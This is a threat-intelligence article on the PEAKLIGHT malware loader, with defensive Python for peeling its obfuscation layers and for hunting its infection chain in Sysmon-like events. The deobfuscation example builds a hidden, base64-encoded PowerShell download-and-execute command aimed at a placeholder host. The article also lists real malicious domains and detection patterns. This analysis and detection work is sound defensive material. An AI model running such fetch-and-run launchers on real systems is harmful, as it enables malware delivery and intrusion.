Security researchers at TRAC Labs have uncovered a new PowerShell-based malware loader, PEAKLIGHT, designed to propagate information stealers through a “malware-as-a-service” model.
According to the researchers, the initial infection vector involves Windows shortcut (LNK) files, which connect to a content delivery network (CDN) to download a JavaScript-based dropper. This dropper executes a PowerShell script that subsequently loads the malicious payload. Among the documented malware distributed via PEAKLIGHT are LummaC2, HijackLoader, and CryptBot.
Also referred to as Emmental Loader, PEAKLIGHT’s malicious LNK files leverage PowerShell in conjunction with mshta.exe to download and execute payloads. For example, a file named Instruction_1928_W9COI.pdf.lnk (a shortcut disguised as a PDF through its double extension) carries arguments that cause mshta.exe to fetch a remote JSON file. That file, in turn, retrieves an executable named dxdiag.exe, a name borrowed from the legitimate DirectX Diagnostic Tool, which contains an encrypted JavaScript payload.
A defining feature of PEAKLIGHT is its extensive use of multilayered obfuscation. Its code stores strings as numeric arrays that are converted back into text via the String.fromCharCode function, and it wraps the next stage in AES encryption. The encrypted payload is decrypted and executed in memory using the CreateDecryptor method of the .NET symmetric-cipher classes, called from PowerShell. The deobfuscated data is ultimately assembled into PowerShell commands that are handed to the interpreter in base64-encoded form.
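As an added illustration of the layers just described (this is example code written for this article, not PEAKLIGHT's own code or TRAC Labs' tooling), the following Python helper rebuilds a string from a numeric array the way String.fromCharCode does, locates an encoded PowerShell command inside the result, and decodes that base64/UTF-16LE layer. The sample array is constructed here from a placeholder command pointing at example.invalid; the AES layer, which needs the key recovered from a real sample, is left out.

```python
import base64
import re
from typing import Dict, List, Optional

# Layer 1: the dropper keeps strings as numeric arrays and rebuilds them with
# String.fromCharCode(). This does the same in Python.
def from_char_code(codes: List[int]) -> str:
    return "".join(chr(c) for c in codes)


# Layer 2: PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text.
def decode_encoded_command(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le")


# The encoded-command switch in its common spellings (-e, -ec, -enc, -EncodedCommand)
# followed by the base64 blob. Requiring whitespace right after the switch keeps
# "-ExecutionPolicy" from matching.
_ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def peel(codes: List[int]) -> Dict[str, Optional[str]]:
    """Turn the numeric array back into text, then decode any encoded PowerShell
    command found in it. Returns both layers so an analyst can inspect each."""
    stage1 = from_char_code(codes)
    m = _ENC_RE.search(stage1)
    if not m:
        return {"stage1": stage1, "stage2": None}
    try:
        stage2 = decode_encoded_command(m.group(1))
    except (ValueError, UnicodeDecodeError):
        stage2 = None  # looked like the switch, but the blob was not a real encoded command
    return {"stage1": stage1, "stage2": stage2}


# Constructed sample (assumption for this example, not data from the PEAKLIGHT sample):
# build an inner command, encode it the way the loader would, then hide the
# launcher line in a numeric array.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_B64 = base64.b64encode(INNER.encode("utf-16-le")).decode()
LAUNCHER = f"powershell.exe -NoP -W Hidden -enc {_B64}"
SAMPLE_ARRAY = [ord(c) for c in LAUNCHER]

if __name__ == "__main__":
    for name, value in peel(SAMPLE_ARRAY).items():
        print(f"{name}: {value}")
```

On a real sample the same two steps repeat for every array found in the script, and the recovered stage-2 text is where the AES key and ciphertext for the next layer usually appear.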
The AutoIt loader embedded within PEAKLIGHT adds another layer of concealment. By calling Win32 API functions such as VirtualProtect, which changes the protection of a memory region so that decrypted bytes can be executed, the script decrypts the payload and runs it directly from memory. The unpacked code never touches disk, which lets it evade traditional file-scanning antivirus solutions.
PEAKLIGHT’s final payload, known as DarkGate, encompasses tools for process injection, obfuscation, and espionage activities. For instance, it employs the Process Hollowing technique: a legitimate Windows process is started in a suspended state, its original code is replaced in memory with the malicious payload, and the process is then resumed so that the code runs under a trusted process name.
The analysis revealed a suite of defensive mechanisms, including environmental checks for virtualization and sufficient free memory. Payloads are downloaded from domains designed to mimic legitimate services, such as docu-sign[.]info.
To ensure robust protection, TRAC Labs advises security professionals to monitor the following activities:
- Connections to suspicious URLs (e.g., docu-sign[.]info and timeless-tales[.]shop);
- Execution of PowerShell scripts with base64 encoding;
- File activity in TEMP directories;
- Execution of AutoIt scripts.
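The four monitoring points above, plus the mshta.exe stage described earlier, can be turned into a simple hunt. The following Python is an added example (not TRAC Labs' detection content) that runs such rules over constructed process-creation, file-creation and network events shaped like Sysmon fields; the event field names and the sample events are assumptions made for this example, while the two domains are the ones named in the report.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Domains named in the TRAC Labs report (defanged with [.] in the article).
IOC_DOMAINS = {"docu-sign.info", "timeless-tales.shop"}

# PowerShell's encoded-command switch (-e, -ec, -enc, -EncodedCommand) followed by a
# base64 blob; the whitespace requirement keeps -ExecutionPolicy from matching.
ENC_PS = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\(?:Temp|Tmp)\\", re.IGNORECASE)
RISKY_EXT = {".exe", ".dll", ".js", ".jse", ".vbs", ".hta", ".ps1", ".a3x", ".au3"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def evaluate(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event trips. Events are flat dicts with
    assumed Sysmon-like fields: type, image, original_file_name, command_line,
    target_filename, dest_hostname."""
    hits: List[str] = []
    kind = ev.get("type")
    if kind == "process_create":
        image = basename(ev.get("image", ""))
        cmd = ev.get("command_line", "")
        orig = ev.get("original_file_name", "").lower()
        if image in {"powershell.exe", "pwsh.exe"} and ENC_PS.search(" " + cmd):
            hits.append("encoded_powershell")
        if image == "mshta.exe" and URL.search(cmd):
            hits.append("mshta_remote_content")
        # The AutoIt interpreter is often renamed; Sysmon's OriginalFileName (from the
        # PE version resource) survives renaming, so check it as well as the image name.
        if orig == "autoit3.exe" or image.startswith("autoit3") or ".a3x" in cmd.lower():
            hits.append("autoit_execution")
    elif kind == "file_create":
        target = ev.get("target_filename", "")
        if TEMP_DIR.search(target) and PureWindowsPath(target).suffix.lower() in RISKY_EXT:
            hits.append("temp_drop")
    elif kind == "network_connect":
        if ev.get("dest_hostname", "").lower().rstrip(".") in IOC_DOMAINS:
            hits.append("ioc_domain")
    return hits


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[Dict[str, str]]]:
    """Group events by the rule they tripped; one event may appear under several."""
    findings: Dict[str, List[Dict[str, str]]] = {}
    for ev in events:
        for rule in evaluate(ev):
            findings.setdefault(rule, []).append(ev)
    return findings


# Constructed sample events (assumptions for this example, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "original_file_name": "MSHTA.EXE",
     "command_line": "mshta.exe http://example.invalid/init.json"},
    {"type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "command_line": "powershell.exe -NoP -W Hidden -enc " + "A" * 40},
    {"type": "file_create", "target_filename": r"C:\Users\u\AppData\Local\Temp\dxdiag.exe"},
    {"type": "process_create", "image": r"C:\Users\u\AppData\Local\Temp\svchost.exe",
     "original_file_name": "AutoIt3.exe", "command_line": "svchost.exe script.a3x"},
    {"type": "network_connect", "dest_hostname": "docu-sign.info"},
    # Benign noise that must not fire: plain script execution and an Office document.
    {"type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"type": "file_create", "target_filename": r"C:\Users\u\AppData\Local\Temp\report.docx"},
]

if __name__ == "__main__":
    for rule, evs in hunt(SAMPLE_EVENTS).items():
        print(f"{rule}: {len(evs)} event(s)")
```

Each rule on its own is noisy (encoded PowerShell and TEMP writes happen on healthy hosts), so in practice the value is in correlating them on one host within a short window, in the order the article describes: LNK, mshta.exe fetching remote content, encoded PowerShell, a drop in TEMP, AutoIt, then the outbound connection.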
PEAKLIGHT’s sophisticated obfuscation techniques and multi-tiered loader design render it one of the most formidable threats to modern systems. TRAC Labs will continue to monitor this campaign, providing timely identification of new tactics, techniques, and procedures (TTPs) and equipping defenders with essential protective measures.